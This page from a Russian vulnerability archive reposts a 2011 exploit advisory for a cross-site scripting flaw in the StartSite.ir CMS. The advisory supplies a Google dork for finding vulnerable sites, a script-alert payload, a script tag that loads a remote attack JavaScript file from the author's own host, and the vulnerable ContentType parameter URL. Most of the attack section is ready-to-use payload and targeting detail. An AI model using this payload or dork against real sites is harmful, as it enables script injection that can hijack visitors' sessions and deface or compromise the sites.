Информационная безопасность
[RU] switch to English


Дополнительная информация

  Cводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  XSS Vulnerability in Redmine 1.0.1 to 1.1.1

From:md.r00t.defacer_(at)_gmail.com <md.r00t.defacer_(at)_gmail.com>
Date:6 апреля 2011 г.
Subject:StartSite.ir Cross-site Scripting Vulnerability

#------------In The Name Of God------------
# StartSite.ir Cross-site Scripting Vulnerability
###################################
#AUTHOR: md.r00t
#Mail: [email protected]
#Website: www.r00t.gigfa.com
#Forum: http://ajaxtm.com/forum
###################################
#Google D0rk:
# "Powered by StartSite.ir"
###################################
# xss EXPLOIT:
<script>alert(/0/)</script>
<script src="http://md-r00t.persiangig.com/xpl/XSS1.JS"></script>
######VULN IN HERE##################

/content.
asp?Catid=247&ContentType=<script>alert(/0/)</script>
####################################
#TNX:
#Ajax Security Team,Aria-Security Team (Persian Security Network),hadihadi & black.shadowes(Virangar Security Team)
*****************************************

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород